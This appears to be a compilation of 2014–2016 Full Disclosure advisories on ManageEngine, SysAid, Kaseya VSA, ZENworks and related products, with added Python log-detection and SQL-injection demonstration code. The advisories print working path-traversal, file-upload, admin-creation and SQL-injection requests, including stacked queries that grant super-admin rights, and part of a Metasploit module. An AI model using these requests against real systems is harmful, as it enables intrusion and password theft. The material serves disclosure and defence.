b) Obtain the file identifier (imageId) for the image that was created
by scraping the page below for "imagename.img" (the fileName parameter
in step 1):
POST /data/getPage.do?method=getPageList=configImgManager
everyPage=1

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015
21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceTy

[FD] [CVE-2015-2862/2863 / CERT VU#919604] Kaseya VSA arbitrary file download / open redirect

2015-07-13 Thread Pedro Ribeiro
tl;dr
Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.

Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].

>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
(http://www.agileinfosec.co.uk/)
==
Disclosure: 13/07/2015 / Last updated: 13/07/2015

>> Background on the affected product:
Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show.


>> Technical details:
#1
Vulnerability: Arbitrary file download (authenticated)
Affected versions: unknown, at least v9

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referrer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (Kaseya_Install_Dir\WebPages\).


#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX

a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)


>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29


Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

[1] 
https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt
[2] https://www.kb.cert.org/vuls/id/919604



[FD] [Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)

2015-06-03 Thread Pedro Ribeiro
Hi,

tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE.
SysAid have informed me they all have been fixed in 15.2, but no
re-test was performed.

Full advisory below, and a copy can be obtained at [1].
5 Metasploit modules have been released and currently awaiting merge
in the moderation queue [2].

Regards,
Pedro

[1]: 
https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt
[2]:
https://github.com/rapid7/metasploit-framework/pull/5470
https://github.com/rapid7/metasploit-framework/pull/5471
https://github.com/rapid7/metasploit-framework/pull/5472
https://github.com/rapid7/metasploit-framework/pull/5473
https://github.com/rapid7/metasploit-framework/pull/5474

>> Multiple vulnerabilities in SysAid Help Desk 14.4
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
=
Disclosure: 03/06/2015 / Last updated: 03/06/2015

>> Background on the affected product:
SysAid is an ITSM solution that offers all the essentials, with
everything you need for easy and efficient IT support and effective
help desk operations. Its rich set of features includes a powerful
service desk, asset management and discovery, self-service, and
easy-to-use tools for understanding and optimizing IT performance.

Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been
released and should be integrated in the Metasploit framework soon.
All vulnerabilities affect both the Windows and Linux versions unless
otherwise noted.


>> Technical details:
1)
Vulnerability: Administrator account creation
CVE-2015-2993 (same CVE as #10)
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4

GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123

This creates an account with the following credentials: mr_lit:secret
Note that this vulnerability only seems to be exploitable ONCE!
Subsequent attempts to exploit it will fail even if the tomcat server
is restarted.


2)
Vulnerability: File upload via directory traversal (authenticated;
leading to remote code execution)
CVE-2015-2994
Constraints: valid administrator account needed (see #1 to create a
valid admin account)
Affected versions: unknown, at least 14.4


POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---81351919525780

-81351919525780
Content-Disposition: form-data; name="activation"; filename="whatevs.jsp"
Content-Type: application/octet-stream

<html><body><% out.println(System.getProperty("os.name")); %></body></html>
-81351919525780--


The response returns a page which contains the following:
var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";
var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";
if(imageUrl != null && $.trim(imageUrl).length > 0)
{
document.getElementById("cropbox").src = imageUrl;
document.getElementById("preview").src = thumbUrl;
parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp";

Go to 
http://server/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp
to execute the JSP.


3)
Vulnerability: File upload via directory traversal (unauthenticated;
leading to remote code execution)
CVE-2015-2995
Constraints: no authentication or any other information needed. The
server has to be running Java 7u25 or lower. This is because Java 7u40
(FINALLY!) rejects NULL bytes in file paths. See
http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more
details.
Affected versions: unknown, at least 14.3 and 14.4

POST /sysaid/rdslogs?rdsName=../../../../sample.war%00
... WAR payload here ...


4)
Vulnerability: Arbitrary file download
CVE-2015-2996 (same CVE as #8)
Constraints: none; no authentication or any other information needed
(see #5 to obtain the traversal path)
Affected versions: unknown, at least 14.4

GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd


5)
Vulnerability: Path disclosure
CVE-2015-2997
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4; only works on the Linux version

POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>

Metasploit PoC:

large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'

res = send_request_cgi({
  'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
  'method' => 'POST',
  'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
  'ctype' => 'application/octet-stream',
  'vars_get' => {
    'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10

[FD] [CVE-2015-0779]: Novell ZenWorks Configuration Management remote code execution

2015-04-07 Thread Pedro Ribeiro
Hi,

I've found and reported an unrestricted file upload vulnerability in
Novell ZenWorks Configuration Management which can be abused to
achieve remote code execution.

The full advisory text is below, and can also be obtained from my repo
[1]. A Metasploit module has been submitted and should hopefully be
accepted soon [2].

Regards,
Pedro

>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
=
Disclosure: 07/04/2015 / Last updated: 07/04/2015

>> Background on the affected product:
Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.

Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.

Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.

Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.

Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.

Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center.

This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).


>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
WAR file payload in the body

The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be ../webapps/). A
Metasploit module that exploits this vulnerability has been released.


>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.


[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096


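A log-side check for the traversal, null-byte and open-redirect request patterns that the WebNMS, Kaseya VSA, SysAid and ZENworks advisories above describe, added here as an example and not part of any of those advisories or posts. The endpoint/parameter table is taken from the advisories; the access-log lines and the trusted-host allowlist are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint -> parameters that the advisories above show carrying a file path.
# Keys are lower-cased because the Kaseya advisory mixes "web20" and "Web20".
FILE_PARAMS = {
    "/servlets/fileuploadservlet": {"fileName"},         # WebNMS, CVE-2016-6600
    "/servlets/fetchfile": {"fileName"},                  # WebNMS, CVE-2016-6601
    "/vsapres/web20/core/downloader.ashx": {"filepath"},  # Kaseya VSA file download
    "/sysaid/getgfiupgradefile": {"fileName"},            # SysAid, CVE-2015-2996
    "/sysaid/rdslogs": {"rdsName"},                       # SysAid, CVE-2015-2995
    "/zenworks/uploadservlet": {"uid", "filename"},       # ZENworks, CVE-2015-0779
}
# Endpoint -> parameters that the Kaseya advisory shows carrying a redirect URL.
URL_PARAMS = {
    "/inc/supportload.asp": {"urlToLoad"},
    "/vsapres/web20/core/localproxy.ashx": {"url"},
}
# Request line inside a common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, rounds=2):
    """Undo up to two layers of percent-encoding so a doubly encoded
    %252e%252e is seen as '..' (parse_qsl already removed one layer)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_reasons(value):
    """Why a file-path parameter value looks like a traversal attempt."""
    reasons = []
    if ".." in re.split(r"[\\/]+", value):
        reasons.append("dot-dot segment")
    if "\x00" in value:                      # SysAid rdslogs %00 truncation
        reasons.append("null byte")
    if re.match(r"^(?:[A-Za-z]:)?[\\/]", value):
        reasons.append("absolute path")
    return reasons


def redirect_reasons(value, trusted_hosts):
    """Why a URL parameter value looks like an off-site redirect."""
    parts = urlsplit(value)
    if parts.scheme in ("http", "https") or value.startswith("//"):
        if (parts.hostname or "") not in trusted_hosts:
            return ["off-site redirect target"]
    return []


def analyze_request(target, trusted_hosts=frozenset()):
    """Return one finding per suspicious watched parameter in a request target."""
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(raw)
        if name in FILE_PARAMS.get(path, ()):
            reasons = traversal_reasons(value)
        elif name in URL_PARAMS.get(path, ()):
            reasons = redirect_reasons(value, trusted_hosts)
        else:
            continue
        if reasons:
            findings.append({"path": parts.path, "param": name,
                             "value": value, "reasons": reasons})
    return findings


def scan_log(lines, trusted_hosts=frozenset()):
    """Run analyze_request over access-log lines; each finding gets its method."""
    results = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for finding in analyze_request(match.group("target"), trusted_hosts):
            finding["method"] = match.group("method")
            results.append(finding)
    return results


# Constructed sample log: the first four entries mirror the proof-of-concept
# requests in the advisories, the last one is an ordinary relative path.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2016:10:00:01 +0000] "GET /servlets/FetchFile?fileName=../../../etc/shadow HTTP/1.1" 200 1337
10.0.0.5 - - [04/Jul/2016:10:00:02 +0000] "POST /servlets/FileUploadServlet?fileName=..%2Fjsp%2FWebStartTest.jsp HTTP/1.1" 200 12
10.0.0.9 - - [03/Jun/2015:12:00:00 +0000] "POST /sysaid/rdslogs?rdsName=../../../../sample.war%00 HTTP/1.1" 200 0
10.0.0.9 - - [13/Jul/2015:12:00:05 +0000] "GET /inc/supportLoad.asp?urlToLoad=http://www.google.com HTTP/1.1" 302 0
10.0.0.2 - - [04/Jul/2016:10:05:00 +0000] "GET /servlets/FetchFile?fileName=logs/access.log HTTP/1.1" 200 500
"""

if __name__ == "__main__":
    # "vsa.example.internal" is an assumed hostname for the allowlist.
    for f in scan_log(SAMPLE_LOG.splitlines(), {"vsa.example.internal"}):
        print(f["method"], f["path"], f["param"], "->", ", ".join(f["reasons"]))
```

Only parameters the advisories name are inspected, so the checker stays quiet on unrelated traffic; extend FILE_PARAMS with a product's own file-handling endpoints to reuse it elsewhere.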
[FD] [The ManageOwnage Series, part XII]: Multiple vulnerabilities in FailOverServlet (OpManager, AppManager, IT360)

2015-01-28 Thread Pedro Ribeiro
Hi,

This is part 12 of the ManageOwnage series. For previous parts, see [1].

This time we have an arbitrary file download, directory content
disclosure and blind SQL injection vulnerabilities in ManageEngine
OpManager, Applications Manager and IT360.

I've pushed two new Metasploit modules into the framework that exploit
the file download and the content disclosure [2], these should
hopefully be accepted soon.
The full advisory text is below, and as always you can get a copy from
my repo [3].

Regards,
Pedro

>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager,
>> Applications Manager and IT360
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
==
Disclosure: 28/01/2014 / Last updated: 28/01/2014

>> Background on the affected products:
ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation.

ManageEngine Applications Manager is a comprehensive application
monitoring software used to monitor heterogeneous business
applications such as web applications, application servers, web
servers, databases, network services, systems, virtual systems, cloud
resources, etc. It provides remote business management to the
applications or resources in the network. It is a powerful tool for
system and network administrators, helping them monitor any number of
applications or services running in the network without much manual
effort.

Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration.


 Technical details:
The affected servlet is the FailOverHelperServlet (affectionately
called FailServlet).
There are definitely more vulnerabilities than the ones identified
below - for example it is possible to hijack the failover operation
completely. The ones listed below are the easy ones to find and
exploit.


#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
b; ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini


#2
Vulnerability: Information disclosure - list all files in a directory
and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
b; ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\


#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a


 Fix:
For Applications Manager, upgrade to version 11.9 b11912.

For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.

These vulnerabilities remain UNFIXED in IT360.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
http://seclists.org/fulldisclosure/2015/Jan/2
http://seclists.org/fulldisclosure/2015/Jan/5

[2]
https://github.com/rapid7/metasploit-framework/pull/4658
https://github.com/rapid7/metasploit-framework/pull/4659

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt

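A worked illustration of vulnerability #3 above (the stacked-statement injection in the standbyUpdateInCentral operation), added here as example code; it is not part of the advisory or of the Metasploit modules. The servlet's real SQL is not shown in the advisory, so the statement shape, the `standby` table and the in-memory SQLite database are assumptions chosen so that the published payload parses; `executescript()` stands in for a database driver that accepts several semicolon-separated statements in one call. The hardened version binds the parameters instead of concatenating them:

```python
import sqlite3

# Constructed stand-in for the servlet's backing table; the real schema is not in the advisory.
SCHEMA = "CREATE TABLE standby (customerName TEXT, serverRole TEXT)"

# The published customerName payload, URL-decoded.
PAYLOAD = "a'); create table bacas (bodas text);-- "


def new_db():
    """Fresh in-memory database with one legitimate row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO standby VALUES ('a', 'primary')")
    return conn


def standby_update_vulnerable(conn, customer_name, server_role):
    """Statement built by string concatenation. The assumed shape ends in IN ('...'),
    so the payload's a') closes both the literal and the parenthesis and the rest of
    the input becomes further statements. executescript() stands in for a database
    driver that runs several semicolon-separated statements in one call."""
    sql = ("UPDATE standby SET serverRole = '%s' WHERE customerName IN ('%s')"
           % (server_role, customer_name))
    conn.executescript(sql)


def standby_update_fixed(conn, customer_name, server_role):
    """Same statement with bound parameters: the payload is only ever a string value,
    and execute() refuses to run more than one statement anyway."""
    conn.execute("UPDATE standby SET serverRole = ? WHERE customerName IN (?)",
                 (server_role, customer_name))


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def demo(update):
    """Send the payload through one of the update functions and report whether the
    attacker's table appeared and what happened to the legitimate row."""
    conn = new_db()
    update(conn, PAYLOAD, "standby")
    role = conn.execute(
        "SELECT serverRole FROM standby WHERE customerName = 'a'"
    ).fetchone()[0]
    return {"bacas_created": table_exists(conn, "bacas"), "row_a_role": role}


if __name__ == "__main__":
    print("concatenated:", demo(standby_update_vulnerable))
    print("parameterised:", demo(standby_update_fixed))
```

With concatenation the injected CREATE TABLE runs and the legitimate row is also rewritten; with bound parameters the whole payload is just a customer name that matches nothing.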

[FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360

2014-12-03 Thread Pedro Ribeiro
Hi,

This is part 9 of the ManageOwnage series. For previous parts see [1].

Today we have yet another 0 day - an arbitrary file download
vulnerability that can be exploited unauthenticated in NetFlow Analyzer
and authenticated in IT360.
I'm releasing this as a 0 day because ManageEngine have been making a
fool out of me for 105 days. I have asked them "are you releasing a
fix soon?" at least a couple of times every month to which they always
responded "yes we will release in the next week/month". And then they
don't release the fix nor provide an explanation. See the advisory
timeline below for details.

A Metasploit auxiliary module that exploits this vulnerability has
been submitted to the Metasploit Framework Github repo in [2].

A full copy of the advisory below can be obtained from my repo in [3].

Regards,
Pedro

 Arbitrary file download in ManageEngine Netflow Analyzer and IT360
 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
==
Disclosure: 30/11/2014 / Last updated: 30/11/2014

 Background on the affected product:
NetFlow Analyzer, a complete traffic analytics tool, leverages flow
technologies to provide real time visibility into the network
bandwidth performance. NetFlow Analyzer, primarily a bandwidth
monitoring tool, has been optimizing thousands of networks across the
World by giving holistic view about their network bandwidth and
traffic patterns. NetFlow Analyzer is a unified solution that
collects, analyzes and reports about what your network bandwidth is
being used for and by whom.

Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration.

This is being released as a 0-day because ManageEngine have been
twiddling their thumbs (and making a fool out of me) for 105 days. See
timeline below for explanation.


 Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above

CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true

CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini

All 3 servlets can be exploited in both Windows and Linux. A
Metasploit module that exploits CVE-2014-5445 has been released.


 Fix:
UNFIXED - ManageEngine failed to take action after 105 days.

Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.

19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded
with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to
exploit them and their impact.

22/08/2014
- Requested information regarding the release date for the fix.
Received response "We do not have a ETA on this, I will check with our
engineering team and update you."

22/09/2014
- Requested information regarding the release date for the fix.
Received response "We expect that the new release will be within the
next couple of weeks."

20/10/2014
- Requested information regarding the release date for the fix.
Received response "Our new release will be happening early by next
week, you can get the update in our NetFlow Analyzer website."
- Asked if they are sure that the fix will be included in the new
release. Received response "yes you are correct, the issue that you
have specified is fixed in new release."

27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a
fix soon. Received response "We will release the PPM file of the
upgrade soon, in which we have fixed the Vulnerability you mentioned."

5/11/2014
- Requested information regarding the release date for the fix.
Received response "You can expect the release before this month end."

28/11/2014
- Requested information regarding the release date for the fix.
Received response "The PPM file is in testing phase and will be
released in next Month."
- Asked if they can commit to a date. Received response "the ppm is in
testing phase now, as it is one of the major release, we will not be
able to give an exact date of release."

30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and
immediately released advisory and exploit.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http

Re: [FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360

2014-12-03 Thread Pedro Ribeiro
On 30 Nov 2014 00:17, Pedro Ribeiro ped...@gmail.com wrote:

 Hi,

 This is part 9 of the ManageOwnage series. For previous parts see [1].

  Technical details:
 Vulnerability: Arbitrary file download
 Constraints: unauthenticated in NetFlow; authenticated in IT360
 Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above

 CVE-2014-5445:
 GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
 GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true

 CVE-2014-5446
 GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini


A small correction: the NetFlow vulnerable versions are actually v8.6 to
v10.2 (which is the latest release). I've updated the advisory in the repo.

Regards
Pedro



[FD] [The ManageOwnage Series, part VII]: Super admin privesc + password DB dump in Password Manager Pro

2014-11-08 Thread Pedro Ribeiro
Hi,

This is part 7 of the ManageOwnage series. For previous parts, see [1].

Today we have a blind SQL injection in Password Manager Pro (PMP) that
can be abused to escalate privileges for a low privileged user (like a
guest) to the super administrator. Using our new powers we can then
dump the whole password database in cleartext.

Unlike in part 6, this time ManageEngine have been responsible and
released an update. It actually took them less than a month to fix it
- so props to the PMP development team.

I have also produced a Metasploit module that performs the injection,
escalates privileges and dumps the password database. It has been
proposed for merging and hopefully should be integrated in the next
few days:
https://github.com/rapid7/metasploit-framework/pull/4155

Details and full advisory text is below. A copy of this advisory can
be obtained from my repo [2].

Regards,
Pedro


 Authenticated blind SQL injection in Password Manager Pro / Pro MSP
 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
==
Disclosure: 08/11/2014 / Last updated: 08/11/2014

 Background on the affected products:
Password Manager Pro (PMP) is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.


 Technical details:
PMP has a SQL injection vulnerability in its search function. A valid
user account is required to exploit the injection, however a low
privileged guest account is enough.

The application uses different database backends by default depending
on its version: versions < 6.8 use the MySQL backend and versions >=
6.8 use PostgreSQL. Single quotes are escaped with backslashes at the
injection point, but this can be somewhat avoided by double escaping
the slashes (\\'). In addition, injected strings are all modified to
uppercase. These two unintended protections make it difficult to
exploit the injection to achieve remote code execution.
However the injection can be abused in creative ways - for example to
escalate the current user privileges to Super Administrator, which
has access to all the passwords in the system in unencrypted format.
This can be achieved by injecting the following queries: "update
AaaAuthorizedRole set role_id=1 where account_id=userId;insert into
ptrx_superadmin values (userId,true);".

A Metasploit module has been released that creates a new Super
Administrator account and exports PMP's password database in CSV
format. All passwords are exported unencrypted.


Vulnerability: Blind SQL injection in SEARCH_ALL parameter (multiple
pages affected)
Constraints: authentication needed (guest / low privileged user account)

CVE-2014-8498
POST /BulkEditSearchResult.cc
Affected versions: Unknown, at least v7 build 7001 to vX build XXX

CVE-2014-8499
POST /SQLAdvancedALSearchResult.cc
POST /AdvancedSearchResult.cc
Affected versions: Unknown, at least v6.5 to vX build XXX

COUNT=1&USERID=1&SEARCH_ALL=[injection here]


 Fix:
Upgrade to version 7.1 build 7105


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12

[2]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt

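The escaping bypass described in the advisory above (a backslash is put before each single quote, so a user-supplied backslash absorbs the added one), worked through as an added example; this is not code from the advisory or from the Metasploit module. The search statement and its table and column names are assumed, since the advisory names the SEARCH_ALL parameter but not the query, and `account_id=5` stands in for the attacker's userId. A small MySQL-style literal scanner shows where the string literal really ends under each escaping rule:

```python
# Assumed shape of the search statement (the table and column are invented).
PREFIX = "SELECT * FROM resources WHERE resource_name LIKE '%"
SUFFIX = "%'"

# Modelled on the privilege-escalation statements quoted in the advisory;
# account_id 5 is a placeholder for the attacker's own userId.
PAYLOAD = ("\\'; update AaaAuthorizedRole set role_id=1 where account_id=5; "
           "insert into ptrx_superadmin values (5,true);--")


def escape_quotes_only(s):
    """What the advisory describes: a backslash before each single quote, nothing else."""
    return s.replace("'", "\\'")


def escape_quotes_and_backslashes(s):
    """Escape the escape character too, so a user-supplied backslash cannot absorb
    the backslash added in front of the quote. (Parameter binding is still the
    proper fix; this only shows why the original filter fails.)"""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def literal_end(sql, start, backslash_escapes=True):
    """sql[start] is an opening single quote. Return the index just past the matching
    closing quote under MySQL-style rules (a backslash escapes the next character,
    '' is a literal quote), or -1 if the literal never closes."""
    i = start + 1
    while i < len(sql):
        c = sql[i]
        if backslash_escapes and c == "\\":
            i += 2
            continue
        if c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2
                continue
            return i + 1
        i += 1
    return -1


def build_query(user_input, escaper):
    # PMP also upper-cases the injected string; SQL keywords are case-insensitive,
    # so that alone does not neutralise the injection.
    return PREFIX + escaper(user_input.upper()) + SUFFIX


def injected_sql(user_input, escaper):
    """Text the database would parse as SQL after the literal closes. An empty
    string means the input stayed inside the literal; None means the literal
    never closed (a syntax error)."""
    sql = build_query(user_input, escaper)
    end = literal_end(sql, PREFIX.rindex("'"))
    return None if end == -1 else sql[end:]


if __name__ == "__main__":
    for name, esc in (("quotes only", escape_quotes_only),
                      ("quotes and backslashes", escape_quotes_and_backslashes)):
        print(name, "->", repr(injected_sql(PAYLOAD, esc)))
```

With quote-only escaping the payload's leading backslash and the filter's backslash pair up, the quote that follows closes the literal, and the UPDATE/INSERT pair becomes live SQL; escaping the backslash as well keeps the whole input inside the literal.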


Re: [FD] Mogwai Security Advisory MSA-2014-01: ManageEngine EventLog Analyzer Multiple Vulnerabilities

2014-09-03 Thread Pedro Ribeiro
On 31 August 2014 16:39, Advisories advisor...@mogwaisecurity.de wrote:
 Mogwai Security Advisory MSA-2014-01
 --
 Title:  ManageEngine EventLog Analyzer Multiple Vulnerabilities
 Product:ManageEngine EventLog Analyzer
 Affected versions:  EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
 Impact: critical
 Remote: yes
 Product link:   http://www.manageengine.com/products/eventlog/
 Reported:   18/04/2013
 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)


 Vendor's Description of the Software:
 --
 EventLog Analyzer provides the most cost-effective Security Information and
 Event Management (SIEM) software on the market. Using this Log Analyzer
 software, organizations can automate the entire process of managing terabytes
 of machine generated logs by collecting, analyzing, searching, reporting,
 and archiving from one central location. This event log analyzer software
 helps to mitigate internal threats, conduct log forensics analysis, monitor
